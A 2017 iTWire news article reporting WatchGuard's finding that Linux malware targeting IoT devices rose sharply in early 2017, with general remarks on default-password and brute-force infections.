Security Market Segment LS
Wednesday, 05 July 2017 09:13

Threats to Linux IoT devices on the rise Featured


Malware detected by the security firm WatchGuard Technologies in the first quarter of 2017 indicated that there is a sharp rise in Linux threats directed against IoT devices.

The company's research, issued under the name Internet Security Report, looked at what was detected by installations of its software. It found that about 36% of the malware detected consisted of these Linux threats.

Many of these devices, which often use old versions of Linux, have a default username and password which users often do not bother to change. Logging in with these credentials — which are easy to find on the Web — gives root access to the device in question.

Corey Nachreiner, WatchGuard's chief technology officer, told iTWire that many of the Linux IoT infections started just as someone scanning the Internet for devices listening on telnet or SSH ports.

"Then they try to brute force a user credential, or use default passwords. If they can brute force a Linux credential, then the automated attack usually just logs into the Linux device and then runs a script to wget a bunch of files, which are Linux tools and trojans," he said. Wget is a popular command-line program used to download files on Linux systems.

Corey Nachreiner"In this scenario, that wget request would generate a Web request to download a file, and that¹s often how our gateway anti-virus would encounter those samples above and block them via HTTP."

Nachreiner (right) said there were remote Linux vulnerabilities that attackers could use to gain control of a Linux system, and then leverage that control to download malware.

"There are other simple attacks (brute-forcing weak SSH credentials) that could allow an attacker to gain local access to a Linux machine, and then try to download his malware. Then there are many Web and email phishing or social engineering techniques, that could try to get a user to unknowingly download malware.

"With our GAV statistics, we can¹t say which of these the attacker is doing, but we can say that these Linux threats attempted to get to a device over the Web, and were blocked."

WatchGuard said its report was based on anonymised Firebox Feed data from more than 26,500 active WatchGuard UTM appliances worldwide, representing a small portion of its overall install base.

Other findings in the report were that legacy anti-virus programs were missing the detection of new malware at a higher rate. AV solutions had missed 38% of the total threats which WatchGuard's products detected in Q1, compared to 30% in Q4 2016, the company claimed.

The report also said that the cyber security battleground was shifting toward Web servers, with drive-by downloads and browser-based attacks dominating in the first quarter of 2017.

It found that attackers were still exploiting the Android StageFright flaw which first gained notoriety in 2015.

Attackers were found to be taking a break from hacking during the holidays with the overall, threat volume decreasing 52% in Q1 2017 compared to Q4 2016.


26-27 February 2020 | Hilton Brisbane

Connecting the region’s leading data analytics professionals to drive and inspire your future strategy

Leading the data analytics division has never been easy, but now the challenge is on to remain ahead of the competition and reap the massive rewards as a strategic executive.

Do you want to leverage data governance as an enabler?Are you working at driving AI/ML implementation?

Want to stay abreast of data privacy and AI ethics requirements? Are you working hard to push predictive analytics to the limits?

With so much to keep on top of in such a rapidly changing technology space, collaboration is key to success. You don't need to struggle alone, network and share your struggles as well as your tips for success at CDAO Brisbane.

Discover how your peers have tackled the very same issues you face daily. Network with over 140 of your peers and hear from the leading professionals in your industry. Leverage this community of data and analytics enthusiasts to advance your strategy to the next level.

Download the Agenda to find out more


Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.



Recent Comments